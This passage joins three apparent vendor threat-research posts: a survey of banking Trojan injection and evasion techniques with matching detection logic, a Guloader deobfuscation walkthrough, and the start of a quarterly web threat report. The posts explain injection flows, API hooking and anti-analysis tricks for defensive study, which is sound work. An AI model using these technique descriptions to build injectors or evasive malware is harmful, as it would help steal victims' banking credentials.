Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure

Executive Summary

While advanced persistent threats get the most breathless coverage in the news, many threat actors have money on their mind rather than espionage. You can learn a lot about the innovations used by these financially motivated groups by watching banking Trojans.

Because attackers constantly create new techniques to evade detection and perform malicious acts, studying monetarily motivated malware can help defenders understand threat actor tactics and protect organizations more effectively. Some of the banking Trojans described here are historically known as financial malware, but they’re now primarily used as infrastructure to deliver other malware. In other words, by preventing the techniques used by banking Trojans, you can also stop other types of threats.

We’ll survey techniques used by notorious banking Trojan families to evade detection, steal sensitive data and manipulate data. We’ll also describe how those techniques can be blocked. These families include Zeus, Kronos, Trickbot, IcedID, Emotet and Dridex.

Palo Alto Networks customers are protected from such attacks using Cortex XDR and WildFire.

Banking Trojan families' techniques discussed: Zeus, Kronos, Trickbot, IcedID, Emotet, Dridex

What Are Webinjects?

Webinjects are modules that inject HTML or JavaScript into a web page before it is rendered, and they are often used to trick users. Banking Trojans are known to abuse them to steal credentials and manipulate form data inside web pages. Most banking Trojan families include at least one webinjects module.

An early stager of the banking Trojan usually injects the banking Trojan’s main bot into a Windows process, and that process injects the webinjects module into the machine’s available web browser processes as shown in Figure 1.

Code snippet showing Trickbot going through browser processes including Chrome, Internet Explorer, Firefox and Microsoft Edge, to inject with its webinjects module.
Figure 1. Trickbot goes through processes one by one to find browsers to inject with its webinjects module, using a stealthy technique known as reflective injection.

The webinjects module hooks the API calls responsible for sending, receiving or encrypting data sent to a web server. By intercepting the data before it is encrypted, the malware can read HTTP-POST headers and manipulate them on the fly.

Code snippet showing Trickbot webinjects module going through browser processes including Internet Explorer, Microsoft Edge, Chrome and Firefox to place hooks.
Figure 2. Trickbot webinjects module placing hooks based on the browser.
Code snippet showing Trickbot placing hooks on Wininet.dll functions including HttpSendRequestA, HttpSendRequestW, HttpSendRequestExA, HttpSendRequestExW and InternetCloseHandle.
Figure 3. Trickbot placing hooks on wininet.dll functions.

By fully controlling the HTTP headers just before the webpage is rendered, the malware can completely modify the forms and fool the user. The malware may inject HTML or JavaScript code to trick the user into inserting sensitive information, such as a PIN code or credit card number, enabling the malware to collect it. The malware can extract this information and send it to its command and control (C2) server without actually sending the forged headers to the targeted web page server.

  • Chrome (chrome.dll): ssl_read, ssl_write
  • Firefox (nspr3.dll / nspr4.dll): PR_Read, PR_Connect, PR_Close, PR_Write
  • Internet Explorer / Edge (Wininet.dll): HttpSendRequest, InternetCloseHandle, InternetReadFile, InternetQueryDataAvailable, HttpQueryInfo, InternetWriteFile, HttpEndRequest, InternetQueryOption, InternetSetOption, HttpOpenRequest, InternetConnect

Table 1. Frequently hooked API functions.

How to Detect Webinjects

This technique can be prevented by detecting an injection into a web browser process. The injected thread calls the NtProtectVirtualMemory function where the NewAccessProtection argument is PAGE_EXECUTE_READWRITE and the BaseAddress argument is an address to a library function targeted by banking Trojans.

For example, Trickbot uses both VirtualProtect and VirtualProtectEx in its various versions. Inspecting NtProtectVirtualMemory calls covers both.

Some banking Trojans opt to avoid code injection. Instead, they suspend the remote process threads and install the hooks remotely. Inspecting remote NtProtectVirtualMemory calls can detect this variant technique.

Code snippet showing NtProtectVirtualMemory prototype.
Figure 4. NtProtectVirtualMemory prototype.
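
The check described above can be sketched as a simple rule over a memory-protection event. This is a minimal illustration rather than a product implementation: the ProtectEvent record, its field names, the browser process names and the is_suspicious_protect helper are all hypothetical, and the sketch assumes a sensor has already resolved BaseAddress to a module and export name. The function list is a subset of Table 1.

```python
from dataclasses import dataclass

PAGE_EXECUTE_READWRITE = 0x40  # Windows memory-protection constant

# Subset of the frequently hooked functions from Table 1, keyed by module.
HOOK_TARGETS = {
    "chrome.dll": {"ssl_read", "ssl_write"},
    "nspr4.dll": {"PR_Read", "PR_Write", "PR_Connect", "PR_Close"},
    "wininet.dll": {"HttpSendRequestA", "HttpSendRequestW",
                    "InternetReadFile", "InternetCloseHandle"},
}

# Assumed browser image names; adjust to the environment being monitored.
BROWSERS = {"chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe"}


@dataclass
class ProtectEvent:
    """Hypothetical record a sensor might emit for NtProtectVirtualMemory."""
    target_process: str         # image name of the process whose memory changes
    new_protection: int         # NewAccessProtection argument
    module: str                 # module that contains BaseAddress
    export: str                 # exported function at BaseAddress, or ""
    from_injected_thread: bool  # caller thread is not backed by a known image


def is_suspicious_protect(ev: ProtectEvent) -> bool:
    """Flag RWX changes on commonly hooked browser networking functions."""
    targets = HOOK_TARGETS.get(ev.module.lower(), set())
    return (
        ev.target_process.lower() in BROWSERS
        and ev.from_injected_thread
        and ev.new_protection == PAGE_EXECUTE_READWRITE
        and ev.export in targets
    )
```

A real sensor would also need to handle the remote variant, where the calling process differs from the target process.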

Infecting Web Browsers During Process Creation

Some banking Trojans aim to infect a target process as soon as it is launched, by injecting code into a predicted parent process of the real target. Once the banking Trojan executes in the context of the parent process, it hooks process creation library functions and waits until the real target is created.

Inside the hook, the banking Trojan manipulates the process creation flow. Then, for example, it initializes the webinjects module inside the remote process. The explorer.exe and runtimebroker.exe parent processes are frequently abused for this goal, as they usually launch the real targets.

For instance, the Karius banking Trojan used this technique by injecting code into explorer.exe and hooking CreateProcessInternalW. The Trojan’s hook handler looked for a spawned web browser process and injected the malicious webinjects module into it.

How to Prevent Attempts to Infect Web Browsers During Process Creation

This technique can be prevented by looking for an injection into explorer.exe or runtimebroker.exe, where the injected thread hooks process creation functions like NtCreateUserProcess, NtCreateProcessEx, CreateProcessInternalW, CreateProcessA or CreateProcessW.
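
As a rough sketch of that rule, the function below intersects the exports an injected thread has patched with the process creation functions listed above. The function name, its parameters and the idea that a sensor supplies a list of patched export names are assumptions made for illustration.

```python
# Parent processes that usually launch the real targets, per the text above.
PARENT_PROCESSES = {"explorer.exe", "runtimebroker.exe"}

# Process creation functions named in the text above.
PROCESS_CREATION_FUNCS = {
    "NtCreateUserProcess", "NtCreateProcessEx", "CreateProcessInternalW",
    "CreateProcessA", "CreateProcessW",
}


def hooked_creation_funcs(process_name, injected_thread, patched_exports):
    """Return the process creation functions patched by an injected thread
    inside a typical parent process (an empty set means no match)."""
    if process_name.lower() not in PARENT_PROCESSES or not injected_thread:
        return set()
    return PROCESS_CREATION_FUNCS & set(patched_exports)
```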

Named Pipe Communication Between Injected Processes

Many banking Trojans use named pipes to communicate with various processes under the threat actor’s control. To do this, they inject their main bot into a Windows process, and then inject their other modules into different processes according to the module’s purpose. They then establish communication between the different processes using named pipes.

For example, Trickbot injects the main bot into svchost.exe. It creates a named pipe server and reflectively injects the webinjects module into web browsers. This injected module connects to the same named pipe as a client to communicate to the main bot and deliver the fetched credentials to the C2 server.

Code snippet showing Trickbot creating a named pipe server.
Figure 5. Trickbot named pipe server.

How to Prevent Named Pipe Communication Between Injected Processes

This technique can be prevented by inspecting named-pipe events. An injected thread creates a named pipe inside a Windows process, and then another injected thread that lives inside a web browser attempts to connect to that same named pipe.
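
The correlation described above can be sketched as a single pass over named-pipe events. The PipeEvent record, its fields and the browser process names are hypothetical; the sketch assumes events arrive in chronological order and that the sensor already knows whether the acting thread was injected.

```python
from dataclasses import dataclass

# Assumed browser image names; adjust to the environment being monitored.
BROWSERS = {"chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe"}


@dataclass(frozen=True)
class PipeEvent:
    """Hypothetical named-pipe event emitted by a sensor."""
    action: str            # "create" or "connect"
    pipe_name: str
    process: str           # image name of the acting process
    injected_thread: bool  # acting thread is not backed by a known image


def correlate_pipes(events):
    """Return pipes created by an injected thread in a non-browser process
    and later connected to by an injected thread inside a browser."""
    servers = set()
    hits = []
    for ev in events:
        if not ev.injected_thread:
            continue
        name = ev.pipe_name.lower()  # pipe names are case-insensitive
        in_browser = ev.process.lower() in BROWSERS
        if ev.action == "create" and not in_browser:
            servers.add(name)
        elif ev.action == "connect" and in_browser and name in servers:
            hits.append(name)
    return hits
```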

Heaven’s Gate Injection Technique

Heaven's Gate is a technique that enables a 32-bit (WoW64) process to execute 64-bit code by performing a far jump/call using segment selector 0x33. Modern malware uses Heaven's Gate to inject into both 64-bit and 32-bit processes from a single 32-bit process on x64 systems. This bypasses WoW64 API hooks, hinders analysis in some debuggers and breaks emulation in some sandboxes.

Even though this method is old, it is still effective and frequently used.

Trickbot and Emotet loaders use Heaven's Gate for process hollowing from a WoW64 process into a 64-bit svchost.exe (For more about process hollowing, see the section on Evasive Process Hollowing By Entrypoint Patching below). The architecture of these two banking Trojans dictates that their main bot persists inside svchost.exe while the web content manipulation and credential stealing modules live inside the browser processes.

Showing Emotet using Heaven's Gate technique in its Microsoft Outlook Messaging API module.
Figure 6. Emotet using Heaven's Gate in its Microsoft Outlook Messaging API (MAPI) module.

How to Prevent Heaven's Gate

A WoW64 process usually goes through the wow64cpu.dll to perform the transition to x64 CPU mode. Heaven's Gate does this transition manually.

Prevention methods can find Heaven's Gate by inspecting whether a WoW64 process system call didn’t go through the wow64cpu.dll. This can be done by placing hooks on critical APIs, generating a stack trace and inspecting the stack trace for wow64cpu.dll.

Showing WoW64's normal syscall flow.
Figure 7. WoW64’s normal syscall flow.
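
The stack inspection described above reduces to a small predicate once a hook has captured the call stack. The sketch below assumes the stack trace has already been resolved to a list of module names; the function name and the input format are hypothetical.

```python
def bypassed_wow64_transition(is_wow64_process, stack_modules):
    """Return True when a WoW64 process reached a hooked API without
    wow64cpu.dll appearing anywhere in the resolved stack trace."""
    if not is_wow64_process:
        return False  # native 64-bit processes never use wow64cpu.dll
    return not any(m.lower() == "wow64cpu.dll" for m in stack_modules)
```

For example, a trace such as ["ntdll.dll", "wow64.dll", "wow64cpu.dll", "ntdll.dll"] would pass, while a trace that goes from an unbacked region straight into the 64-bit ntdll.dll would be flagged.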

Evasive Process Hollowing by Entrypoint Patching

Process hollowing is a process injection technique that creates a new legitimate process in a suspended mode, unmaps its main image and replaces it with malicious code. The malicious code is written into the newly created process and the suspended thread context instruction pointer is changed using NtGetContextThread/NtSetContextThread.

Security product vendors check for main image unmapping combined with the usage of NtGetContextThread/NtSetContextThread to detect process hollowing.

A known technique for evading detection is to patch the process entry point with a small jump that redirects execution to the payload without actually using NtGetContextThread/NtSetContextThread functions or unmapping the main image. For example, Trickbot and Kronos have both used this technique.

Kronos mapped a suspended svchost.exe into its own process and patched it in its own memory address space. Similar to other banking Trojans, Kronos' main module ran within svchost.exe and orchestrated the whole operation from the remote svchost.exe process.

Trickbot implemented process hollowing by first using VirtualProtectEx on the process entrypoint, and then writing the hook stub using WriteProcessMemory.

Code snippet showing Kronos mapping svchost.exe and patching its entrypoint.
Figure 8. Kronos mapping svchost.exe and patching its entrypoint.
Figure 9. Kronos hook stub template – x86 opcodes for push and ret.

How to Prevent Evasive Process Hollowing by Entrypoint Patching

This technique can be prevented either by inspecting whether the address argument provided to the calls of NtWriteVirtualMemory or NtProtectVirtualMemory is a remote process entry point or by detecting suspicious remote mapping and reading of svchost.exe memory.
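
To illustrate the first option, the sketch below recognizes a push/ret stub of the kind shown in Figure 9 and checks whether it is being written to a process entry point. It assumes the 32-bit encoding (opcode 0x68 followed by a 4-byte immediate, then 0xC3); the function names and parameters are hypothetical, and a sensor would have to supply the image base and entry point RVA of the remote process.

```python
import struct


def parse_push_ret(buf: bytes):
    """Return the 32-bit target if buf starts with `push imm32; ret`,
    otherwise None."""
    if len(buf) >= 6 and buf[0] == 0x68 and buf[5] == 0xC3:
        return struct.unpack_from("<I", buf, 1)[0]
    return None


def is_entrypoint_patch(write_addr, buf, image_base, entry_rva):
    """Flag a remote write that places a push/ret stub on the entry point."""
    at_entry = write_addr == image_base + entry_rva
    return at_entry and parse_push_ret(buf) is not None
```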

PE Injection

Common injection methods used by banking Trojans involve writing a mapped PE into a remote process using WriteProcessMemory. Some malware families try to obscure the call by wiping artifacts from the buffer, such as wiping the PE header.

For example, Zeus variants use this technique to inject themselves into other processes, allowing them to stay hidden, as well as to perform webinjects and to perpetrate financial data theft.

Code snippet from Zeus injection code, taken from its leaked source code.
Figure 10. Zeus injection code from its leaked source code.

How to Prevent PE Injection

This technique can be prevented by inspecting the buffer sent to NtWriteVirtualMemory for executable artifacts.
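
A minimal sketch of such a buffer check follows. It looks for an intact MZ/PE header first and falls back to a weaker heuristic based on common section names, since some families wipe the header. Both function names are hypothetical, and a buffer with every artifact removed would evade this sketch.

```python
import struct


def looks_like_pe(buf: bytes) -> bool:
    """Check for an MZ header whose e_lfanew field (offset 0x3C)
    points at the PE signature."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    return buf[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def has_section_names(buf: bytes) -> bool:
    """Weaker heuristic for buffers whose headers were only partly wiped."""
    names = (b".text", b".rdata", b".data", b".reloc")
    return any(name in buf for name in names)
```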

Process Injection via Hooking

Hooking can be used as an injection technique. Injecting a banking Trojan’s main payload into a legitimate-looking process maintains stealth and helps avoid endpoint protection detection.

This technique utilizes hooking to get code execution, usually by hooking a frequently called API function with a jump to a payload/shellcode. This avoids calling any suspicious APIs often used in code injection techniques like CreateRemoteThread or NtSetContextThread.

For instance, IcedID injects its main bot into a hollowed instance of svchost.exe using API hooking. This is also known as the ZwClose technique (ZwClose was the hooked API in Zberp, the first to employ this injection technique in the wild).

The injection flow of IcedID is slightly different from that of Zberp. It first hooks NtCreateUserProcess and then calls CreateProcessA to create svchost.exe without any special parameters or arguments. In a regular flow, the newly created svchost.exe should terminate right away.

Code snippet from IcedID initiating svchost.exe hooking.
Figure 11. IcedID initiates svchost.exe hooking.
Code snippet from IcedID hooking NtCreateUserProcess.
Figure 12. IcedID hooks NtCreateUserProcess.

However, because IcedID hooked NtCreateUserProcess, the hook handler is called right after the call to CreateProcessA. In the handler, it performs the following activities:

  • Unhooks NtCreateUserProcess
  • Calls NtCreateUserProcess (which creates svchost.exe)
  • Decompresses a local buffer that contains the payload to inject using RtlDecompressBuffer
  • Allocates memory for the payload in the remote svchost.exe process using NtAllocateVirtualMemory
  • Writes the payload into the remote svchost.exe using ZwWriteVirtualMemory

For the execution, IcedID hooks RtlExitUserProcess in the newly created svchost.exe with a jump stub to the payload. As mentioned, svchost.exe was created without any parameters and it will try to exit. However, due to the IcedID hook, it will jump to the payload.

Code snippet from IcedID hooking RtlExitUserProcess.
Figure 13. IcedID hooks RtlExitUserProcess.

How to Prevent Injection via Hooking

This technique can be prevented by inspecting calls to NtProtectVirtualMemory and NtWriteVirtualMemory. The provided address argument for NtProtectVirtualMemory is an exported function from one of the Windows libraries, and the NtWriteVirtualMemory written buffer is a hooking stub. In both cases, the remote process has to be a known injection target.
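
One way to test whether a written buffer is a hooking stub is to decode it as a jump and see where it lands. The sketch below assumes the stub is a 5-byte `jmp rel32` (opcode 0xE9); real stubs can take other forms, and the function names and module-range parameters are hypothetical.

```python
import struct


def parse_jmp_rel32(buf: bytes, address: int):
    """Return the absolute destination if buf starts with `jmp rel32`
    written at `address`, otherwise None."""
    if len(buf) < 5 or buf[0] != 0xE9:
        return None
    rel = struct.unpack_from("<i", buf, 1)[0]  # signed displacement
    # The displacement is relative to the end of the 5-byte instruction.
    return (address + 5 + rel) & 0xFFFFFFFFFFFFFFFF


def is_hook_write(buf, address, module_start, module_end):
    """Flag a jump stub written onto an exported function when the jump
    destination lies outside the module that owns the function."""
    dest = parse_jmp_rel32(buf, address)
    return dest is not None and not (module_start <= dest < module_end)
```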

AtomBombing Injection Technique

AtomBombing is a technique that allows malware to inject code while avoiding calling suspicious APIs that security vendors are watching. Dridex uses a slightly modified AtomBombing technique that injects one of its stages into a Windows process (usually explorer.exe) and employs various steps to cause financial data theft.

Malware using the AtomBombing technique first writes the payload into the global atom table, which can be accessed by all processes. It then dispatches an asynchronous procedure call (APC) to the APC queue of a target process thread using NtQueueApcThread, forcing the target process to call GlobalGetAtomA.

The target thread then retrieves the payload from the global atom table and inserts it into a read/write (RW) region inside the target process memory space (a code cave inside the kernelbase.dll data section). The payload has to be split into NULL-terminated strings and an atom is created for each string.

For the execution, the injector process dispatches another APC using NtQueueApcThread to force the remote process to execute NtSetContextThread. The injected process then calls NtSetContextThread, which invokes a return-oriented programming (ROP) chain that allocates execute/read/write (RWX) memory. The ROP chain then copies the payload from the RW region into the newly allocated RWX region, and lastly, executes it.

The unique idea behind AtomBombing is the write-primitive, which allows writing to the remote process using atom tables and APC.

Dridex uses a variation of AtomBombing that queues an APC to call memset to clean an RW region in ntdll.dll. Then, it copies the payload and its import table into the target process using the same write technique into the ntdll.dll RW region.

For the execution, Dridex modifies the copied payload memory into executable memory using NtProtectVirtualMemory. Then it hooks GlobalGetAtomA by calling NtProtectVirtualMemory and by using the same write primitive. Finally, it queues an APC into the patched GlobalGetAtomA to get the payload running.

Code snippet from AtomBombing proof of concept
Figure 14. AtomBombing proof of concept code.

How to Prevent AtomBombing and its Variants

These techniques can be prevented by inspecting whether the arguments provided to NtQueueApcThread/NtSetContextThread calls point to a suspicious API – the APC routine argument in the case of NtQueueApcThread, or the new instruction pointer in the context argument in the case of NtSetContextThread. Both API calls have to be called into a remote process.
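
That check can be sketched as follows. The set of suspicious routines contains only the functions named in this section, and the function name and its parameters are hypothetical: a sensor would have to resolve the APC routine (or the new instruction pointer) to a symbol before calling it.

```python
# Functions named in this section as APC routines or redirect targets.
SUSPICIOUS_ROUTINES = {"GlobalGetAtomA", "memset", "NtSetContextThread"}


def is_suspicious_remote_call(caller_pid, target_pid, resolved_symbol):
    """Flag NtQueueApcThread or NtSetContextThread calls that target a
    remote process and point at one of the suspicious routines.

    resolved_symbol is the APC routine for NtQueueApcThread, or the new
    instruction pointer for NtSetContextThread, resolved to an export name.
    """
    is_remote = caller_pid != target_pid
    return is_remote and resolved_symbol in SUSPICIOUS_ROUTINES
```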

Conclusion

Threat actors who are in it for the money use a wide range of malware techniques for injection and financial fraud, and they are always looking for new ways to evade detection. We have explored some of the more interesting banking Trojan techniques and how they’re used to steal victims’ sensitive data. Finally, we have described how each technique can be detected so that the malicious behavior can be prevented.

Palo Alto Networks customers using Cortex XDR receive protections from such attacks in different layers, including the following:

  • Local Analysis Machine Learning module
  • Behavioral Threat Protection
  • Behavioral indicators of compromise (BIOC) and Analytics BIOCs rules

These layers identify the tactics and techniques that banking Trojans use at different stages of their execution.

Palo Alto Networks customers also receive protections against the attacks discussed here through the WildFire cloud-delivered security subscription for the Next-Generation Firewall.

Indicators of Compromise

  • Trickbot
    • testnewinj32Dll.dll: 4becc0d518a97cc31427cd08348958cda4e00487c7ec0ac38fdcd53bbe36b5cc
    • Webinjects: ef6603a7ef46177ecba194148f72d396d0ddae47e3d6e86cf43085e34b3a64d4
  • Emotet: dd20506b3c65472d58ccc0a018cb67c65fab6718023fd4b16e148e64e69e5740
  • Kronos: aad98f57ce0d2d2bb1494d82157d07e1f80fb6ee02dd5f95cd6a1a2dc40141bc
  • Zeus: 0f409bc42d5cd8d28abf6d950066e991bf9f4c7bd0e234d6af9754af7ad52aa6
  • IcedID: 358af26358a436a38d75ac5de22ae07c4d59a8d50241f4fff02c489aa69e462f
  • Dridex: ffbd79ba40502a1373b8991909739a60a95e745829d2e15c4d312176bbfb5b3e

 

Defeating Guloader Anti-Analysis Technique

Executive Summary

Unit 42 researchers recently discovered a Guloader variant that contains a shellcode payload protected by anti-analysis techniques, which are meant to slow down human analysts and sandboxes processing this sample. To help speed up analysis of this sample and others like it, we are providing a complete Python script, available on GitHub, that deobfuscates the Guloader sample.

In early September 2022, we discovered a Guloader variant with low VirusTotal detection. Guloader (also known as CloudEye) is a malware downloader first discovered in December 2019.

We analyzed the control flow obfuscation technique used by this Guloader sample to create the IDA Processor module extension script so researchers can deobfuscate the sample automatically. The script can be applied to other malware families like Dridex, which utilize similar anti-analysis techniques.

Palo Alto Networks customers receive protections from malware families using similar anti-analysis techniques with Cortex XDR or the Next-Generation Firewall with cloud-delivered security services, including WildFire and Advanced Threat Prevention.

Related Unit 42 Topics: Malware, anti-analysis

Guloader Control Flow Obfuscation Technique

The Guloader sample in question uses the control flow obfuscation technique to hide its functionalities and evade detection. This technique impedes both static and dynamic analysis.

First, let’s look at how this threat hampers static analysis. In short, it uses CPU instructions that trigger exceptions, resulting in unintelligible code during static analysis.

After peeling away the packer layer of our Guloader sample, we see that its code is obfuscated. Using static analysis tools such as IDA Pro, we observe many 0xCC bytes (or int3 instructions) littered throughout the sample, as shown in Figure 1.

Following the 0xCC bytes are junk instructions. These added bytes disrupt the static analysis tool’s disassembly process, resulting in the wrong disassembly listing.

Scrolling through obfuscated code to show 0xCC bytes throughout.
Figure 1. Obfuscated code blocks.

0xCC bytes are CPU instructions that trigger an exception EXCEPTION_BREAKPOINT (0x80000003), which pauses the execution of a process. The CPU will pass the code flow to the handler function before the execution continues. The handler function is responsible for moving the instruction pointer to the correct address.

The presence of these same 0xCC bytes means that using a debugger during dynamic analysis would crash the Guloader sample. Debuggers insert 0xCC bytes as software breakpoints to halt the execution of the sample, so the debugger handles the exception instead of the handler function.

Before understanding what happens in the handler function, we first have to locate its address.

Guloader uses the AddVectoredExceptionHandler function to register the handler function, as shown in Figure 2. The second argument of the AddVectoredExceptionHandler function points to the address of the handler function.

Function prototype of AddVectoredExceptionHandler used to register the handler function.
Figure 2. Function prototype of AddVectoredExceptionHandler.

Using a debugger as shown in Figure 3, we locate the address of the handler function registered by the Guloader sample. With the address information, we can examine its code. Notably, this ExceptionHandler is registered with the order of 1, meaning it is the first handler to be invoked.

Using a debugger to locate the address of the handler function that the Guloader sample registers through AddVectoredExceptionHandler.
Figure 3. Debugging the call to AddVectoredExceptionHandler in Guloader sample.

Analyzing the Vectored Exception Handler Function

The first step of analyzing the handler function is to apply its type information, as shown in Figure 4.

Showing the type information for the handler function.
Figure 4. Type information for the handler function.

Next, we apply the type information for three Windows data structures (shown in Figure 5) used by the handler function.

Showing the type information of three Windows data structures to be applied on the handler function.
Figure 5. Type information of three Windows data structures to be applied on the handler function.

With the type information applied, we can examine how the function handled the exceptions caused by the 0xCC bytes. Figure 6 shows the decompiled handler function (Func_VectoredExceptionHandler) annotated with comments.

Decompiled handler function (Func_VectoredExceptionHandler) annotated with the following comments: "Check type of exception raised," "Check for hardware breakpoint," "CC byte raising exception," "Decode offset byte," "Loop to check for software breakpoint," "Exit handler function if software breakpoint is found," and "Update EIP with offset."
Figure 6. Decompiled handler function.

The handler function begins with anti-debugging checks. It will terminate execution when hardware or software breakpoints are found. Next, the offset value is computed by XOR decoding the byte after the 0xCC byte with 0xA9. Finally, the offset value is added to the instruction pointer before the code execution resumes. Code execution continues at the address pointed to by the updated instruction pointer.
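
The offset computation can be modeled in a few lines of Python. This is a sketch of the arithmetic only, not the handler itself: the function name is hypothetical, the anti-debugging checks are omitted, and `ip` stands for whatever instruction pointer value the handler reads from the exception context, which the description above does not pin down.

```python
XOR_KEY = 0xA9  # key used to decode the byte that follows 0xCC
INT3 = 0xCC


def resume_address(code: bytes, index: int, ip: int) -> int:
    """Decode the byte after the 0xCC at `index` and add it to `ip`,
    mirroring the handler's instruction pointer update."""
    if code[index] != INT3:
        raise ValueError("no 0xCC byte at the given index")
    offset = code[index + 1] ^ XOR_KEY
    return ip + offset
```

For instance, if the byte after 0xCC is 0xAC, the decoded offset is 0xAC XOR 0xA9 = 0x05, so execution resumes five bytes past `ip`.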

After understanding how the obfuscation is carried out, we can identify the legitimate instructions and discard the unwanted ones, as shown in Figure 7.

Labeled code block so we can identify the legitimate instructions and discard the unwanted ones
Figure 7. Labeled code block.

To completely deobfuscate the Guloader sample, we need to replace all the 0xCC bytes with a JMP short instruction (0xEB) and the following byte with the decoded offset value.
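
On a raw byte buffer, the replacement for a single location can be sketched as shown here. The function name is hypothetical. Note two assumptions: the caller must already know that `index` is a real instruction boundary (a 0xCC that is part of another instruction's operand must not be patched), and the decoded value is written unadjusted, as described above. A JMP short displacement is measured from the end of the 2-byte instruction, so an adjustment may be needed depending on which instruction pointer value the handler starts from.

```python
XOR_KEY = 0xA9
INT3 = 0xCC
JMP_SHORT = 0xEB


def patch_int3(buf: bytearray, index: int) -> None:
    """Replace the 0xCC at `index` with a JMP short opcode and the
    following byte with its XOR-decoded value, in place."""
    if buf[index] != INT3:
        raise ValueError("no 0xCC byte at the given index")
    buf[index] = JMP_SHORT
    buf[index + 1] ^= XOR_KEY
```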

Because doing all this manually is time consuming, in the next section we will show you how to write an IDA Processor module extension to automate the deobfuscation process.

Writing an IDA Processor Module Extension

IDA Processor module extensions allow us to influence the disassembler logic in IDA Pro. These extensions are written using Python to enable us to filter and manipulate how IDA Pro disassembles the instructions in the sample.

The Python script extends the ev_ana_insn method in the IDP_Hooks class. It starts by checking if the current instruction is the 0xCC byte. Next, the 0xCC byte is replaced with the JMP short instruction (0xEB). Finally, the following byte is replaced with the decoded offset value.

Figure 8 shows the function in the Python script where this deobfuscation is implemented.

Function in the Python script where we're extending the ev_ana_insn() to deobfuscate the sample.
Figure 8. Extending the ev_ana_insn() to deobfuscate the sample.

After applying the Python script, IDA Pro can deobfuscate the Guloader sample automatically, as shown in Figure 9.

Code before and after applying the Python script so IDA Pro can deobfuscate the Guloader sample automatically
Figure 9. Obfuscated code (left) and code block after deobfuscation (right).

Conclusion: Malware Analysts vs. Malware Authors

Malware authors often include obfuscation techniques, hoping that they will increase the time and resources required for malware analysts to process their creations. Using the steps above, you can reduce the time needed to analyze these malware samples from Guloader, as well as those of other families using similar techniques.

Palo Alto Networks customers receive protections from malware families using similar anti-analysis techniques with Cortex XDR or the Next-Generation Firewall with cloud-delivered security services, including WildFire and Advanced Threat Prevention.

Indicators of Compromise

SQ21002728.IMG:
SHA256: fb8e52ec2e9d21a30d7b4dee8721d890a4fbec48103a021e9c04dfb897b71060
SQ21002764

SQ21002728.vbs:
SHA256: 56cdfaa44070c2ad164bd1e7f26744a2ffe54487c2d53d3ae318d842c6f56178
SQ21002764

 

Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving

Executive Summary

Palo Alto Networks Advanced URL Filtering subscription collects data regarding two types of URLs: landing URLs and host URLs. We define a malicious landing URL as a page that gives a user the opportunity to click a malicious link. A malicious host URL is a page containing a malicious code snippet that could abuse someone’s computing power, steal sensitive information or perform other types of attacks.

Our researchers regularly track web threats to better understand trends that develop over time. This blog will cover trends we’ve identified between April 2022 and June 2022 using our web threat detection module.

Our detection module found around 751,000 incidents of malicious landing URLs containing different kinds of web threats, 253,000 (around one third) of which are unique URLs. In addition, the detection module also detected around 1,740,000 malicious host URLs, 256,000 (almost 15%) of which are unique.

In this blog, we present our analysis and findings of these web threat trends, including the following information:

  • When these web threats were more active
  • Where they were hosted
  • What categories they belong to
  • Which malware families are the most prevalent

We will also examine a malicious downloader case study regarding a campaign that shows how malicious JavaScript downloaders are evolving to evade different kinds of detections.

Palo Alto Networks customers receive protections from the web threats discussed here, as well as many others, via the Advanced URL Filtering, DNS Security and Threat Prevention cloud-delivered security services.

Types of Attacks and Vulnerabilities Covered: Skimmer attacks, malware
Related Unit 42 Topics: Information disclosure, A Closer Look at the Web Skimmer

Web Threats Landing URLs: Detection Analysis

Between April and June 2022, we collected data from customers of our Advanced URL Filtering subscription using the web threat detection module, which relies on special YARA signatures. We detected 751,331 incidents of landing URLs containing all kinds of web threats, such as web skimmers and web scams. Of these landing URLs, 253,644 were unique. Compared with the results from last quarter (Q1 2022), which had a total of 577,275 detected landing URLs and 116,643 unique URLs, both totals rose in Q2.
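
To put the quarter-over-quarter change in numbers, the short calculation below uses only the four figures quoted above. The helper name is ours.

```python
def pct_change(old: int, new: int) -> float:
    """Percentage change from old to new."""
    return (new - old) / old * 100


q1_total, q2_total = 577_275, 751_331
q1_unique, q2_unique = 116_643, 253_644

total_growth = pct_change(q1_total, q2_total)     # all detections
unique_growth = pct_change(q1_unique, q2_unique)  # unique URLs only
unique_share = q2_unique / q2_total * 100         # share of Q2 hits that are unique

print(f"total: {total_growth:+.1f}%")
print(f"unique: {unique_growth:+.1f}%")
print(f"unique share in Q2: {unique_share:.1f}%")
```

Total detections grew by roughly 30%, while unique landing URLs more than doubled.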

Web Threats Landing URLs Detection: Time Analysis

Figure 1 shows the total number of web threat hits in Q2 of 2022, how many of those hits were unique, and how many of those hits were also observed last quarter. As we can see, the repeated unique number from Q1 is low, which suggests that attackers are always trying to target new entry points.

Bar chart describing web threats landing URLs distribution April-June 2022. Blue bars indicate all detections, including repeated detections of the same URL, red bars indicate detection of unique URLs, and orange bars indicate a detection that was seen in 2022 Q1 but unique in 2022 Q2.
Figure 1. Web threats landing URLs distribution April-June 2022. (Blue bars indicate all detections, including repeated detections of the same URL, and red bars indicate detection of unique URLs. Orange bars indicate a detection that was seen in Q1 2022 but unique in Q2 2022.)

Web Threats Landing URLs: Geolocation Analysis

According to our analysis, the previously mentioned 253,644 unique URLs are from 34,833 unique domains. After identifying the geographical locations for these domain names, we found the majority of them seem to originate from the United States, followed by Germany and Russia, as was also the case last quarter. However, we recognize attackers are leveraging proxy servers and VPNs located in those countries to hide their actual physical locations.

The choropleth map shown in Figure 2 indicates the wide distribution of these domain names across almost every continent. Figure 3 shows the top eight countries where the owners of these domain names appear to be located.

Choropleth map showing the geolocation distribution of landing URLs between April and June 2022
Figure 2. Web threat landing URLs’ domain geolocation distribution April-June 2022.
Pie chart showing distribution of originating country of landing URLs from April to June 2022. United States - 64.4%, Germany - 4.9%, Russia - 2.0%, France - 2.0%, Canada - 1.8%, United Kingdom - 1.7%, Netherlands - 1.7%, India - 1.3%, Others - 20.2%
Figure 3. Top eight countries where web threat landing URLs’ domains originated April-June 2022.

Web Threats Landing URLs: Category Analysis

